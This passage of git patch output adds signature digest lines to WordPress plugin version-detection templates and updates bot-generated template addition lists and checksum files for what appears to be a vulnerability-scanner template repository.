480a00453043022021b342329da02116e11db543fd957e5a2e0a400776e9fca823532254602f6ad5021f11c85ffcc3d0cae5751ecaaef2cefcc8c855df26b67f055bf17ed70bb4176b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..739e454687 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009524ac307d480d9b7f43048cb383ae8d7f6e73942322186bdf33952000dcbaab022030604dae91d9711f86155c198b8a4b8429eecccbfd9d165742e966e5c0de43d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..213c144075 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcf621ae5eb22ba0782cf87dba752660bb0b641d30a3189bdf4acb3910d988ba0220517544fd61e02d8e9ba5d62cb92a96a530be1878614e12fa5eaf65c1a6b88eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..8584be8149 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100955f24949ae70523673909cf2d3a7eafb3953c5dc1e5201548859c361aff5d640221009951e4d11e324a15e4d9ed01f62d7d5e3cdc50196ae331cb5c97b2bafc2ac894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..f7a9fd831a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092cc0fbc42afd081789bcd268bd3ab7f156ae5472ba288e905d11499d0ccd3cc0220589f826740b23a01ca87ca73bb8464ecff2dc0b8658be8dc70b4e0bc432279e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..66a705b988 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aac2fd0322dfbaa85f4404f9ae8e65fdb01d0a95c278d0ac02aac097a7f096f002202865d2a23dbefdb5331b56634ea2b89e5f02d11df8b498edbe0a3289ede725a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..ca10cb404e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb7d24d5be658291ef8a333cab81ef2c257c9907275d1b70d58914267900be5c0220568f6e172760c842d0ba241a0fb9dcdddc77b9a66dde10a6139aad20f091c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..6cc6d4c942 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220547782293e71b224e40adca23c17c1dadc7ac0466aff1321814b16173936991102206f3f234ba0ec4288e49ca83bfe3837403c106a25e11bb821a1b5e4b09968d8d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..cb02bc5e3f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220331d4e2002dfc93d1abe84da0eaeb11275e83e8590a560a64c6232ec669990ac02202d7734df37b87e0d1b7b1ad308ed0c0082ab552609d2fb675e53aab1c4e29dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..5ab2312cd4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f9e75415bb46b16ed20f118974140dd56ba11574d72e45894e17ea4a78fcf176022100e41568d665ea627c4e14946779c2498816a484f6fae909288d80523f65e11bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..dfc9de67b1 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203eac0fcde4e714de5917052c018171eee4e506e0d90edbba3e0afdc282882283022100a9be4c4e98d1bee48ff0451f7e1d827a22f205010d006fbea8d9ca65c19ef078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..6b2682e7d0 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e5b0d6b115127daebc1dd00fea531a41e0823be832c7fc8e32a25c15cf028ab702207c6501db73db2d3dbccef9bf9bb27ff5267c61e99db49cbe334b24c787ea2bb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..d508d803ce 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b320f67619f0d42b3b98f4b1cffff6ce72abb1a1ae1bac514fe78d71948d4ea02200464d090ca2e194772f46e86c65c6a60e91d2ea9435cc10324b7dd455c38a855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..36ec75ea89 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae1c1be95dfad1e14955c7207ce06ce266b8b45e15f13e83c90cf31e1185bb1702207759c1d58c4d74760bd343f130355afaa007e1f7692f696b6148c7eb6e769ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..a547c6d5e0 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013a9316ed662a3186a8a9fcb4952b333247d06866790df9e41b02fb168e4860c02201c676990c5b60a8df22a706c16309a3fda7ce32e6e67aeeca1d0ca909a6f19f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..43b57a314d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206acfe23c37fa2142f789e6974c8c7107a773dc62a552e149c6336db0f97ba1f902204c73ee3c89c74675c955adbb329ade400ef4bc3017d31cc64bc1e54aa0604219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..27b9f672ce 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087be68015b00440fbc282de11607244b3b55928e82cb814e85284f441d7772560221008feace7ed5bfa3818834f107af1908cc4816347ca1d169c7a77b4d5f7c2b40cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..b58585e8bb 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc95b5d76c817abbf83b41a3873d969d1d852402ba02e1a23d4a6e742216d8dc022025382aed1b8e6269996b2ae4f4a5b663030e861af86674ded0985445c38c66eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..fa0e2c3fd9 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009692ab26a68458f02dceefcce4d4925423670d06bea11bd0584376b69829f4c70220194e4219dccc3bb335ec61b6dd166038dec4f9bfc77c9569124cff7e60d253a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..a633ef9e0a 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220194731e67a351cbbae0154fdce9eabb2df0085d373027c644fa52b7a34ec42c902206163846ea7651bde7266a009fd7570f08ef0b4e09a3525b58c65e8d47b9531f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..a84b7643a9 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bae80353f0fb5eb68f10c6f37538f06b1859f0ce00ccc5831c91840d2077698a0221009b540bd242affd6b6181fabc955405b319ee638f6bce33ad845309cb5a97c8f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..4515dbe77c 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a69cdc99578f17ca531c68e29820406c67d116af4b82e7d4cf0f4937502eeb7022100fbcf056290b3f5cef6f0fcd71907ebae25d1b1f8405246c42ecb23d1ba1edb1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..a15f4c8a5c 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202b106bcc0a706084c042dc80bdff6f9a98c4ee8d1b72e45cc8eb873431f5e7eb0220717f9e0a9e1a5b85eca8f61dfe56263e24990f07cc95b6678bb11ce14842336b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..02936dde28 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5dbc8c4961406720186b89c5822c5f7ef0899639d77f77fa7dc6549e881ca8902201b049f51deab51f4316b4b7cc6470bc7d42ae44b82cea3e6b903b747756454f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..bcf46c8f1e 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010d8aa19289ca9c78b514e55c486d87e0d345fb2cd419949153d5938404322e002210086459a9f8f2d2c78770762195a0c18ef75440034285fbf088ecc772eb171243c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..1303a274e6 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016c84883b1e7c6fca2e7b844fcf7b06d5f6d723e1bbc057fc2a07d25e3dfd5c702204de464c9f6abb7da1615df6ce51b1302bd1e13cb1ff0228001cdfa4a67e72d44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..eb9c5b84b7 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c857a0d344120f7153cdf32d3994d166ddfb3d0617bcb86dd8a2b0388d8705c0221008be2c740ac664f15c7d0a785c57029ad8faa1d8a8a6db037e98f33a9dfbde518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..f12e075f4e 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5adf07949ce503f7f61bde9880de60a0bcadae990570e4fbb45f22e029f8fef022008d977895a1a4bc59b6a8d5d9b8057fa8bc59ad4c599ec39ceace7a5f69df71c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..0383e6d58b 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001ca0b24ff29c9fde336940b863aa33f860288cace40ff711e2029562c0da93d0220594ea656a44fdec2d2028e5fcf294601af741765f64867748589d0c9afa56605:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..72b186d6fd 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e37859619509f365e5ccf09524902dcf94c53c54bc6c2569c38eeaa9a0d8c37022100f3051f9ad67daa2b75df6c69cb75d19a5c97bbb51aa79426ea2fc68024667610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..b18b788450 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ef87572725cb107854522b3c6e0bb09f882ed2aaa1d533999a3600a7e6af85c0220630efdbdf9dde27e7de28d6313114fbf6cbd962fd15bce3c5e87727d85cc7cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..1b8b67ccee 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026e18ef7f58e80e76e0adb8501de473350ac8b0973abe5282a87bcec7c85b16002207396d287c9964635d5f358a0355a7b9ab7a6426842e76a4970eb5dbedfc59e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..501ae3437f 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200f12b8501d39ac1ebd6cdb6734b7546e96e09c163633842debb6cecfe974029402201997c1ad4e64c9b682aff6c042b3243cc5ed2bce823857e0dfe8c0111b687033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..a8c552ec42 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082e6a3e66ec9fd5a8696bbc18e7542ea345e757e09280d9733eac640707634450221008909fe2fcb50936e038c21fa55108e797ee44e6a4b3b7f29ff069993d5819cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..4ce1c70e71 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee0d5efebdfef7ca0da3445b481e4646a50979662117399006be28bc5b4d97a1022100bb86838eee07c7c0833a8ad84be639447e5b2de9af7d8868e7ef6311cc972030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..a18ca34acf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fc7fd3ba5de0c5e31cac3d07d51a50dcc4b61034728a097250cd2c03ab3e86eb022100c93614290fce9171d7b98b334a77bd381022628fef3a6b99bae5b78fea42588c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..23e7898281 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003077b580da7c820c11563f163ad0cce3bad7fcb9f775997be8c55b64c7f3dc40220442b160824cd09f65db8a68e809e8cb9f66e300bfe38ecf88f92de12116e6a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..e57121a67d 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2319acf8cb39e01cf47d13cdbb4d8ba87d6ddcbb1c5128577574f2093608a970220095049155a6ed1a936cadc7dcb6225771b700859da00645a7bfa761dae37e289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..760a82e7fd 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7c05b849903f8e983226de459d5d1d7b1c49d5453d4e3e499a1a31373b4865e0220596d25e676c6412791ffd21e5b674f619f7920b7d55afd730f0ec20be7af808e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 636d9f6cbb382c9fb473fec46c75ec96ac964d51 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 07:38:49 +0000 Subject: [PATCH 13/46] Auto Generated New Template Addition List [Thu Aug 1 07:38:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 19ef0d4019..576ef8add6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-44393.yaml +http/cves/2023/CVE-2023-5222.yaml http/cves/2024/CVE-2024-39903.yaml http/cves/2024/CVE-2024-39907.yaml http/cves/2024/CVE-2024-6205.yaml From 0166999097e11fb00f6d03a8d4a60ac1743cdc20 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 07:38:59 +0000 Subject: [PATCH 14/46] Auto Generated Templates Checksum [Thu Aug 1 07:38:59 UTC 2024] :robot: --- templates-checksum.txt | 407 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c8afd6eb21..1c47a205c4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3355,6 +3355,7 @@ http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 +http/cves/2023/CVE-2023-5222.yaml:8bc7f580ccca2609792ecc60285ec1716d4c2c35 http/cves/2023/CVE-2023-52251.yaml:4ca51f181f6db2932a1254864b5544ae056d8c88 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 @@ -3507,7 +3508,7 @@ http/cves/2024/CVE-2024-38289.yaml:fc8b321f6b565cc6feea194cb9265ff81d325e09 http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-39250.yaml:ff485ce5537d94dfd260abb578b3c4d85ecb3797 http/cves/2024/CVE-2024-39903.yaml:5f5e882db1afe8518a20e0edb57150abae54b674 -http/cves/2024/CVE-2024-39907.yaml:cf74b191dfa13bc6ff13ee7a604008a728ed697c +http/cves/2024/CVE-2024-39907.yaml:451e6402d65c267c32597f47c71b31f70efe48c5 http/cves/2024/CVE-2024-39914.yaml:2c8d9d4637d5806823bcba86390d8646d1db66bf http/cves/2024/CVE-2024-40348.yaml:e1b3c7bd1bfe293d155f1999f412eee670c8334b http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 @@ -3538,7 +3539,7 @@ http/cves/2024/CVE-2024-6587.yaml:3b9b74b62b5fee24b9ae9e2138affc55ffabe1d3 http/cves/2024/CVE-2024-6646.yaml:2e73ea26a9329272c114fbee69cc648183fda206 http/cves/2024/CVE-2024-6746.yaml:d4ab2b4730c55e4aa424d56e07cd03f9b2c26859 http/cves/2024/CVE-2024-6922.yaml:83b019597ae43258e9b9b0786304ed398ce3fe14 -http/cves/2024/CVE-2024-7120.yaml:7ce8a36714ff6ef0316679cc10c73edd07e50572 +http/cves/2024/CVE-2024-7120.yaml:1cb58450440b39c5cc43b9254854e957e962dbe8 http/cves/2024/CVE-2024-7188.yaml:5edd2259c08b9141388e13eb5fba2281baa93044 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -7343,230 +7344,230 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:a7399d933cd777d4e4695fbe2c3a9f4ddbc57148 +http/technologies/wordpress/plugins/add-to-any.yaml:e2f856286ff23eedc328e4f4ba32d7fa48f5cd2b +http/technologies/wordpress/plugins/admin-menu-editor.yaml:83b3d189e29a297c3f41a9c8c08bc3f25b9a2398 